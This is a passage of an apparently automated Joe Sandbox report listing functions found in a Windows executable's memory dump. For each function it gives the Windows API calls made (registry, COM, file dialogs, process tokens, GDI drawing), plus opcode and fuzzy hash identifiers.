                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1414292761-0
                                                      • Opcode ID: ae009057f66604e2b65ca64405614fc1e9063ac96dcbd329e8a321509125d795
                                                      • Instruction ID: 39ddce9b61ab7b5bb6626d9cf90e881a1be1146dc7e8630bc515be0060c51566
                                                      • Opcode Fuzzy Hash: ae009057f66604e2b65ca64405614fc1e9063ac96dcbd329e8a321509125d795
                                                      • Instruction Fuzzy Hash: 825104726A0206AFDB258F64EC81EAF77A9EF94794F245229FC15F6250DB34DC40C660
                                                      Function 00EBBBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                        • Part of subcall function 00EBC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EBB6AE,?,?), ref: 00EBC9B5
                                                        • Part of subcall function 00EBC998: _wcslen.LIBCMT ref: 00EBC9F1
                                                        • Part of subcall function 00EBC998: _wcslen.LIBCMT ref: 00EBCA68
                                                        • Part of subcall function 00EBC998: _wcslen.LIBCMT ref: 00EBCA9E
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EBBCCA
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EBBD25
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EBBD6A
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EBBD99
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EBBDF3
                                                      • RegCloseKey.ADVAPI32(?), ref: 00EBBDFF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                      • String ID:
                                                      • API String ID: 1120388591-0
                                                      • Opcode ID: dfccb9cecbe54336bcae5e947592106fcccfee75b643842b2ce2eaf42f38cbd7
                                                      • Instruction ID: 775a2bb70a66d5060593494b215faf1d293418ab52b6f4d740c3de809c455a05
                                                      • Opcode Fuzzy Hash: dfccb9cecbe54336bcae5e947592106fcccfee75b643842b2ce2eaf42f38cbd7
                                                      • Instruction Fuzzy Hash: 0B81A030208241AFD714DF24C895E6BBBE5FF84308F14996CF4996B2A2DB71ED45CB92
                                                      Function 00E8F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • VariantInit.OLEAUT32(00000035), ref: 00E8F7B9
                                                      • SysAllocString.OLEAUT32(00000001), ref: 00E8F860
                                                      • VariantCopy.OLEAUT32(00E8FA64,00000000), ref: 00E8F889
                                                      • VariantClear.OLEAUT32(00E8FA64), ref: 00E8F8AD
                                                      • VariantCopy.OLEAUT32(00E8FA64,00000000), ref: 00E8F8B1
                                                      • VariantClear.OLEAUT32(?), ref: 00E8F8BB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                      • String ID:
                                                      • API String ID: 3859894641-0
                                                      • Opcode ID: 874aa65baafb5c0d3ea9ce7a8569678407556a1b91b353a9ccaaf77c19824436
                                                      • Instruction ID: d63e1aabb50eba51cdedfb6e6e733baa915d00cfecf37e7ce9851ff479836065
                                                      • Opcode Fuzzy Hash: 874aa65baafb5c0d3ea9ce7a8569678407556a1b91b353a9ccaaf77c19824436
                                                      • Instruction Fuzzy Hash: A751B631640310BACF14BBA5D895B69B3E9EF85714F24B466E90EFF292DB708C40C766
                                                      Function 00EA910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E37620: _wcslen.LIBCMT ref: 00E37625
                                                        • Part of subcall function 00E36B57: _wcslen.LIBCMT ref: 00E36B6A
                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00EA94E5
                                                      • _wcslen.LIBCMT ref: 00EA9506
                                                      • _wcslen.LIBCMT ref: 00EA952D
                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00EA9585
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$FileName$OpenSave
                                                      • String ID: X
                                                      • API String ID: 83654149-3081909835
                                                      • Opcode ID: c8605c16026a312e57c20a76de7aa39f35399deee70e076cd50840388fd0dc81
                                                      • Instruction ID: 475ed8a62f5033da069b69d9adfeb26a093d659a7ef08a8d2edf9293e6e3afae
                                                      • Opcode Fuzzy Hash: c8605c16026a312e57c20a76de7aa39f35399deee70e076cd50840388fd0dc81
                                                      • Instruction Fuzzy Hash: 11E1A2715083009FC724DF24C485B6ABBE4FF89314F15996DF899AB2A2DB31ED05CB92
                                                      Function 00E4920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E49BB2
                                                      • BeginPaint.USER32(?,?,?), ref: 00E49241
                                                      • GetWindowRect.USER32(?,?), ref: 00E492A5
                                                      • ScreenToClient.USER32(?,?), ref: 00E492C2
                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E492D3
                                                      • EndPaint.USER32(?,?,?,?,?), ref: 00E49321
                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00E871EA
                                                        • Part of subcall function 00E49339: BeginPath.GDI32(00000000), ref: 00E49357
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                      • String ID:
                                                      • API String ID: 3050599898-0
                                                      • Opcode ID: a23d44bb093ba1b860625393a076f52ce4703c7c6f93c8e277ee89f900ebbc66
                                                      • Instruction ID: 436ac6efd50349c79fd3882d7c173e4ef751a6a24ad157ede92b9f99e94f8419
                                                      • Opcode Fuzzy Hash: a23d44bb093ba1b860625393a076f52ce4703c7c6f93c8e277ee89f900ebbc66
                                                      • Instruction Fuzzy Hash: A6419130105200AFD721DF25EC88FAB7BF8FB46724F140269F998A72E2C7719845DB61
                                                      Function 00EA07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00EA080C
                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00EA0847
                                                      • EnterCriticalSection.KERNEL32(?), ref: 00EA0863
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00EA08DC
                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00EA08F3
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00EA0921
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3368777196-0
                                                      • Opcode ID: abbee473b9e345ebafd96a24acfe70d6a678468dd15708e9bd0094bf4381a3ca
                                                      • Instruction ID: 9d44ca4435cf5ef65b51ac088983c83afe7592f5d4c9e1b27c76ce43d67181bc
                                                      • Opcode Fuzzy Hash: abbee473b9e345ebafd96a24acfe70d6a678468dd15708e9bd0094bf4381a3ca
                                                      • Instruction Fuzzy Hash: 78419A31900205EFDF04AF54DC85AAAB7B8FF48310F1440A9ED04AE296DB31EE65CBA4
                                                      Function 00EC81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00E8F3AB,00000000,?,?,00000000,?,00E8682C,00000004,00000000,00000000), ref: 00EC824C
                                                      • EnableWindow.USER32(00000000,00000000), ref: 00EC8272
                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00EC82D1
                                                      • ShowWindow.USER32(00000000,00000004), ref: 00EC82E5
                                                      • EnableWindow.USER32(00000000,00000001), ref: 00EC830B
                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00EC832F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
                                                      • Opcode ID: 11443f68715e13636f9934e2343d4cd9eea4fbe772bf1572712f7948f2f56087
                                                      • Instruction ID: 7a61062553431b7de82c0166eae931c9c5d11e235ec43ac87e5d85790a953b7b
                                                      • Opcode Fuzzy Hash: 11443f68715e13636f9934e2343d4cd9eea4fbe772bf1572712f7948f2f56087
                                                      • Instruction Fuzzy Hash: 50418334601644EFDB15CF25CB99FA47BE0FB0A718F18616DE5486B272CB33A846CB50
                                                      Function 00E94C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00E94C95
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E94CB2
                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E94CEA
                                                      • _wcslen.LIBCMT ref: 00E94D08
                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E94D10
                                                      • _wcsstr.LIBVCRUNTIME ref: 00E94D1A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                      • String ID:
                                                      • API String ID: 72514467-0
                                                      • Opcode ID: 396a64e4a960ae33cc56fd73ff67ae6ba356fed0b4d9346fe617f9ac8149b085
                                                      • Instruction ID: 586563ff742310c00086866242e6e9a875406ac5b700dde1517bac0970a7933e
                                                      • Opcode Fuzzy Hash: 396a64e4a960ae33cc56fd73ff67ae6ba356fed0b4d9346fe617f9ac8149b085
                                                      • Instruction Fuzzy Hash: 392129B52042007FEF155B35AD09E7B7BDCDF45B54F105039F809EA1D1EA61DC0282A1
                                                      Function 00EA581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E33AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E33A97,?,?,00E32E7F,?,?,?,00000000), ref: 00E33AC2
                                                      • _wcslen.LIBCMT ref: 00EA587B
                                                      • CoInitialize.OLE32(00000000), ref: 00EA5995
                                                      • CoCreateInstance.OLE32(00ECFCF8,00000000,00000001,00ECFB68,?), ref: 00EA59AE
                                                      • CoUninitialize.OLE32 ref: 00EA59CC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 3172280962-24824748
                                                      • Opcode ID: 0256bde76ebb080b66ab32e933f08560ee28637499d46b49918191f1560abb04
                                                      • Instruction ID: 5199cd9027dd70fa7e937d15d2f27f159c29fa245531f5b2b429bcdffcf926f5
                                                      • Opcode Fuzzy Hash: 0256bde76ebb080b66ab32e933f08560ee28637499d46b49918191f1560abb04
                                                      • Instruction Fuzzy Hash: 0ED174766087019FC714DF25C484A2ABBE2FF8A714F14985DF889AB361DB31EC45CB92
                                                      Function 00E9175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E90FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E90FCA
                                                        • Part of subcall function 00E90FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E90FD6
                                                        • Part of subcall function 00E90FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E90FE5
                                                        • Part of subcall function 00E90FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E90FEC
                                                        • Part of subcall function 00E90FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E91002
                                                      • GetLengthSid.ADVAPI32(?,00000000,00E91335), ref: 00E917AE
                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E917BA
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00E917C1
                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E917DA
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,00E91335), ref: 00E917EE
                                                      • HeapFree.KERNEL32(00000000), ref: 00E917F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                      • String ID:
                                                      • API String ID: 3008561057-0
                                                      • Opcode ID: 5c979a85dbdaecd456216af2fb9d24d2592086636eca9f0fd56e0a641485b81e
                                                      • Instruction ID: b05ea7ca30c4fd50e150e7aee1d789ed10a429cbf624849bb245ec4b383b5e18
                                                      • Opcode Fuzzy Hash: 5c979a85dbdaecd456216af2fb9d24d2592086636eca9f0fd56e0a641485b81e
                                                      • Instruction Fuzzy Hash: E811AC32605206FFDF109FA6CC49FAE7BB9EB42359F244069F445B7220C736A945CB60
                                                      Function 00E914CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E914FF
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00E91506
                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E91515
                                                      • CloseHandle.KERNEL32(00000004), ref: 00E91520
                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E9154F
                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E91563
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                      • String ID:
                                                      • API String ID: 1413079979-0
                                                      • Opcode ID: 8b2df1a46d3bf8c63919fcc0044983480a553f41a3a637c8c1181f683d9672f0
                                                      • Instruction ID: 3a0db22b74ba379187766778a039d54e52c8e2c1a42980c9975144d86ed3a1f8
                                                      • Opcode Fuzzy Hash: 8b2df1a46d3bf8c63919fcc0044983480a553f41a3a637c8c1181f683d9672f0
                                                      • Instruction Fuzzy Hash: 21114A7250020AAFDF118FA8DD49FDE7BA9FB48748F154065FA05B2060C3768E659B60
                                                      Function 00E53382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00E53379,00E52FE5), ref: 00E53390
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E5339E
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E533B7
                                                      • SetLastError.KERNEL32(00000000,?,00E53379,00E52FE5), ref: 00E53409
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: e6dbbf786bea74411e81dc5e6ef647d0744eef419fda69647360c2d3579b857e
                                                      • Instruction ID: 17b772a1560e8816307b53a2fef1110cc0e7ef9983b665f5dcbacec0a63388f3
                                                      • Opcode Fuzzy Hash: e6dbbf786bea74411e81dc5e6ef647d0744eef419fda69647360c2d3579b857e
                                                      • Instruction Fuzzy Hash: B8016832608311BEE61527757C819A62A84DB413FF330263DFD20B51F0EF514D0F9148
                                                      Function 00E62D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00E65686,00E73CD6,?,00000000,?,00E65B6A,?,?,?,?,?,00E5E6D1,?,00EF8A48), ref: 00E62D78
                                                      • _free.LIBCMT ref: 00E62DAB
                                                      • _free.LIBCMT ref: 00E62DD3
                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00E5E6D1,?,00EF8A48,00000010,00E34F4A,?,?,00000000,00E73CD6), ref: 00E62DE0
                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,00E5E6D1,?,00EF8A48,00000010,00E34F4A,?,?,00000000,00E73CD6), ref: 00E62DEC
                                                      • _abort.LIBCMT ref: 00E62DF2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free$_abort
                                                      • String ID:
                                                      • API String ID: 3160817290-0
                                                      • Opcode ID: a5984ee8e0a24144333e4e5b3602a4519df58d095c6033e3d8179e32b11b0320
                                                      • Instruction ID: 782a2eb45af4f8b51dfc58387f8f3fda7b654bb72a738c9b0e23114148d03bad
                                                      • Opcode Fuzzy Hash: a5984ee8e0a24144333e4e5b3602a4519df58d095c6033e3d8179e32b11b0320
                                                      • Instruction Fuzzy Hash: 38F0CD315C5E012BC2122739BC16E5E1599AFC17E5F35241CFA28B21D1DF258C065260
                                                      Function 00EC8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E49639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E49693
                                                        • Part of subcall function 00E49639: SelectObject.GDI32(?,00000000), ref: 00E496A2
                                                        • Part of subcall function 00E49639: BeginPath.GDI32(?), ref: 00E496B9
                                                        • Part of subcall function 00E49639: SelectObject.GDI32(?,00000000), ref: 00E496E2
                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00EC8A4E
                                                      • LineTo.GDI32(?,00000003,00000000), ref: 00EC8A62
                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00EC8A70
                                                      • LineTo.GDI32(?,00000000,00000003), ref: 00EC8A80
                                                      • EndPath.GDI32(?), ref: 00EC8A90
                                                      • StrokePath.GDI32(?), ref: 00EC8AA0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                      • String ID:
                                                      • API String ID: 43455801-0
                                                      • Opcode ID: b1b257498af01b67f7f982db335862763baa99af260f8780e00f769d508e894e
                                                      • Instruction ID: 2776b670ef6f41380dcd0ec9ff0ae81a2e469e67e65378cd6d4ac0bff98bf58a
                                                      • Opcode Fuzzy Hash: b1b257498af01b67f7f982db335862763baa99af260f8780e00f769d508e894e
                                                      • Instruction Fuzzy Hash: EF11397200010CFFDB129F91DC88EAA7F6CEB08354F008026FA49AA1A1C7729D56DFA0
